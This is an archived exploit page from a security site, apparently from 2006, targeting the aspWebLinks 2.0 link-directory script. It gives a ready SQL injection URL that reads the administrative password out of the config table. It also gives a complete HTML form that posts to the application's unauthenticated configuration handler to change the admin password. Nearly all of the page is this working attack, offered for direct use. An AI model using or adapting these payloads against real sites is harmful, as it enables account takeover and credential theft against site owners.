首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
aspWebLinks 2.0 Remote SQL Injection / Admin Pass Change Exploit
来源:vfocus.net 作者:ajann 发布时间:2006-06-02  

<!--
# Title : aspWebLinks 2.0 Remote Admin Pass Change Exploit and links.asp SQL Injection
# Author : ajann
# Dork : aspWebLinks 2.0

SQL INJECTION:
http://[target]/[path]/links.asp?action=reporterror&linkID=221%20union%20select+0,administrativepassword,0,0,0,0,0,0,0+from+config
-->


<title>AspWebLink 2.0 Remote Admin Pass Change Exploit</title>
<form method='POST' action='links.asp?action=modifyconfigprocess'><input
type='hidden' name='txtConfigID' value='1'><input type='hidden'
name='txtSkinName' value='default'><table border='0' width='100%'
cellspacing='0' cellpadding='3'><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Administrative
Password:</b></font></td><td width='70%'><input type='text'
name='txtAdministrativePassword' size='43'
value='EDITPASSWORD'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Days
New:</b></font></td><td width='70%'><input type='text'
name='txtNumberOfDaysNew' size='43' value='15'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Number of Visits Hot:</b></font></td><td width='70%'><input
type='text' name='txtHotRating' size='43' value='200'></td></tr><tr><td
width='30%' align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Links Per Page:</b></font></td><td width='70%'><input
type='text' name='txtRecordsPerPage' size='43' value='12'></td></tr><tr><td
width='30%' align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Category Header:</b></font></td><td width='70%'><input
type='text' name='txtCategoryHeader' size='43' value='<b>Select A
Category:</b>'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Category
Columns:</b></font></td><td width='70%'><input type='text'
name='txtCategoryCols' size='43' value='2'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1" color="black"><b>Sub
Category Header:</b></font></td><td width='70%'><input type='text'
name='txtSubCategoryHeader' size='43' value='Select A Sub Category to pick
or ADD your link:'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Show Category
Description:</b></font></td><td width='70%'><input type='radio' value='YES'
name='txtShowCatDescription' checked >YES<input type='radio' value='NO'
name='txtShowCatDescription' >NO</td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Show Whats New on
home page:</b></font></td><td width='70%'><input type='radio' value='YES'
name='txtShowWhatsNew' checked >YES<input type='radio' value='NO'
name='txtShowWhatsNew' >NO</td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of New
items on home page:</b></font></td><td width='70%'><input type='text'
name='txtHowManyNew' size='43' value='10'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Show Whats Hot on home page:</b></font></td><td
width='70%'><input type='radio' value='YES' name='txtShowWhatsHot' checked
>YES<input type='radio' value='NO' name='txtShowWhatsHot'
>NO</td></tr><tr><td width='30%' align='right' valign='top'><font
face="Tahoma" size="1" color="black"><b>Require approval for link and review
additions:</b></font></td><td width='70%'><input type='radio' value='YES'
name='txtNeedApproval' checked >YES<input type='radio' value='NO'
name='txtNeedApproval' >NO</td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Hot
items on home page:</b></font></td><td width='70%'><input type='text'
name='txtHowManyHot' size='43' value='10'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Whats New Header:</b></font></td><td width='70%'><input
type='text' name='txtWhatsNewHeader' size='43' value='<b>Whats
New:</b>'></td></tr><tr><td width='30%' align='right' valign='top'><font
face="Tahoma" size="1" color="black"><b>Whats Hot Header:</b></font></td><td
width='70%'><input type='text' name='txtWhatsHotHeader' size='43'
value='<b>Whats Hot:</b>'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Sort Links
By:</b></font></td><td width='70%'><select size='1' name='txtSortBy'><option
selected value='ALPHA'>Alphabetically</option><option value='DATE'>Date
Added</option><option value='HITS'>Number of
Visits</option></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1"
color="black"><b></b></font></td><td width='70%'><input type='submit'
value='Update Configuration' name='B1'></td></tr></table></form>



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·TinyPHP Forum <= 3.6 (profi
·LifeType <= 1.0.4 SQL Injec
·MS Windows XP/w2k3 (Explorer.e
·FunkBoard CF0.71 (profile.php)
·pppBlog <= 0.3.8 (randompic
·SCart 2.0 (page) Remote Code E
·gxine 0.5.6 (HTTP Plugin) Remo
·Claroline <= 1.7.6 (include
·Speedy ASP Forum (profileupdat
·Dmx Forum <= 2.1a (edit.php
·Eggblog <= 3.x Remote (SQL
·Linux Kernel < 2.6.16.18 (N
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved